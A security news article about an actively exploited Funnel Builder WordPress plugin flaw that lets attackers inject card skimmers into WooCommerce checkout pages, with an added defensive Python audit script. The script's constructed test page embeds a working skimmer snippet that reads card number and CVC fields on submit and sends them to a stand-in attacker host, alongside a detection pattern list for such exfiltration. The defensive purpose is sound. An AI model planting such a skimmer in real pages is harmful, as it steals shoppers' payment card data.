A critical vulnerability in the Funnel Builder WordPress plugin is actively being exploited to inject malicious JavaScript into WooCommerce checkout pages, targeting payment card data, according to research published by Sansec this week.

The flaw allows an unauthenticated attacker to modify checkout workflows, which is enough to inject skimming code directly into payment forms. Threat actors use it to harvest customer payment details at the moment customers submit them. No CVE identifier has been assigned yet, which suggests the issue is either very recent or still being coordinated between Sansec and the plugin's maintainers.

WooCommerce stores using the Funnel Builder plugin face immediate risk. Attackers can inject persistent JavaScript into checkout pages, so every customer attempting to purchase receives and executes the malicious code. A copy of the entered card data is sent to attacker-controlled infrastructure while the legitimate payment completes normally. That is what makes skimming hard to catch with traditional fraud detection: at the time of capture the transaction looks ordinary to both the customer and the payment processor, and the fraud only surfaces later, when the stolen card data is used elsewhere.

Sansec's report describes exploitation in the wild, so this is not a theoretical issue: e-commerce sites running the plugin may already have been compromised. Attackers monitor plugin vulnerabilities continuously and often have working exploits before official patches ship.

Store operators should immediately audit their Funnel Builder installations, compare the scripts actually loaded on the checkout page against the ones the store is expected to load, and update to a patched version as soon as one is available. Sansec recommends reviewing recent transaction logs for signs of unauthorized payment attempts or chargebacks. Under PCI DSS, a merchant that suspects card data was compromised must notify its acquirer and the affected card brands; obligations to notify customers come from the applicable breach-notification laws.
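As an added example (not Sansec's tooling and not the plugin's code), the script below shows one way to carry out the checkout-page audit described above: it collects every script on the page, flags external script sources whose host is not on an allowlist of hosts the store is expected to load from, and flags inline scripts that combine typical skimmer indicators (a form-submit hook, reads of card-number or CVC fields, runtime code decoding, fire-and-forget requests) or that reference a host outside the allowlist. The sample HTML, the allowlisted hosts and the attacker hostnames are all constructed for the example; point it at a saved copy of your own checkout page and replace the allowlist with the hosts your store really uses.

```python
"""Audit a WooCommerce checkout page for injected skimmer JavaScript.

Added example; not code from Sansec or the Funnel Builder plugin. The sample
HTML and hostnames below are constructed so the audit runs offline.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts expected to serve script on this checkout page (assumption for the
# example: the store itself plus its payment processor). Replace for your store.
ALLOWED_SCRIPT_HOSTS = {"example-store.test", "js.stripe.com"}

# Indicators typical of checkout skimmers; an inline script is flagged only when
# several co-occur or when it references a host outside the allowlist.
SUSPICIOUS_PATTERNS = [
    r"\.addEventListener\s*\(\s*[\x22\x27]submit[\x22\x27]",  # hooks form submit
    r"card[-_]?num",                                          # reads card number field
    r"\bcv[vc]\b",                                            # reads CVV/CVC field
    r"atob\s*\(|String\.fromCharCode|eval\s*\(",              # decodes/builds code at runtime
    r"new\s+Image\s*\(\s*\)\.src|navigator\.sendBeacon",      # fire-and-forget exfiltration
]
URL_RE = re.compile(r"https?://[^\s\x22\x27<>]+", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script> as {"src": ..., "body": ...} in document order."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def external_hosts(text, allowed):
    """Hosts referenced by absolute URLs in text that are not allowlisted."""
    hosts = []
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        if host and host not in allowed and host not in hosts:
            hosts.append(host)
    return hosts


def audit_checkout_html(html, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return (finding_kind, detail) tuples for scripts a store owner should review."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for script in collector.scripts:
        if script["src"]:
            host = urlparse(script["src"]).hostname
            # A relative src has no host and is served by the store itself.
            if host and host not in allowed:
                findings.append(("external_script_not_allowlisted", script["src"]))
        else:
            body = script["body"]
            hits = [p for p in SUSPICIOUS_PATTERNS if re.search(p, body, re.I)]
            exfil = external_hosts(body, allowed)
            if exfil or len(hits) >= 2:
                findings.append(("suspicious_inline_script",
                                 {"indicators": hits, "exfil_hosts": exfil,
                                  "snippet": body.strip()[:60]}))
    return findings


# Constructed checkout page: legitimate scripts first, then two injected ones.
LEGIT_HEAD = """<html><head>
<script src="https://js.stripe.com/v3/"></script>
<script src="/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<script>var wc_checkout_params = {"ajax_url":"/wp-admin/admin-ajax.php","is_checkout":"1"};</script>
"""
INJECTED = """<script src="https://cdn.example-attacker.test/jquery.min.js"></script>
<script>document.addEventListener('submit', function () {
  var d = {n: document.querySelector('#card-number').value,
           c: document.querySelector('#cvc').value};
  new Image().src = 'https://cdn-stats.example-attacker.test/c.gif?d=' + btoa(JSON.stringify(d));
});</script>
"""
TAIL = "</head><body><form id=\"checkout\"></form></body></html>\n"
SAMPLE_CHECKOUT_HTML = LEGIT_HEAD + INJECTED + TAIL
CLEAN_CHECKOUT_HTML = LEGIT_HEAD + TAIL

if __name__ == "__main__":
    for kind, detail in audit_checkout_html(SAMPLE_CHECKOUT_HTML):
        print(kind, detail)
```

The two-indicator threshold for inline scripts is a deliberate trade-off: WooCommerce itself emits inline configuration blobs on checkout, and a single pattern hit on one of those would be noise, whereas a submit hook that reads card fields and fires a request to an unknown host is exactly the shape of a skimmer. Run the audit against a saved copy of the page after every plugin update, not just once, since the injection described here is persistent and can be re-applied.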

This incident reflects a broader pattern of attacks on WordPress plugins that touch the payment flow. E-commerce sites running outdated or unpatched plugins remain soft targets. Plugin developers should gate every function that writes checkout content behind WordPress capability checks (current_user_can) and nonce verification, and site administrators should maintain aggressive patch management. Until a patch is released, store owners should consider temporarily disabling the Funnel Builder plugin. Restricting checkout to known customers is a weaker measure: it limits who is exposed, but does nothing about code that has already been injected into the page.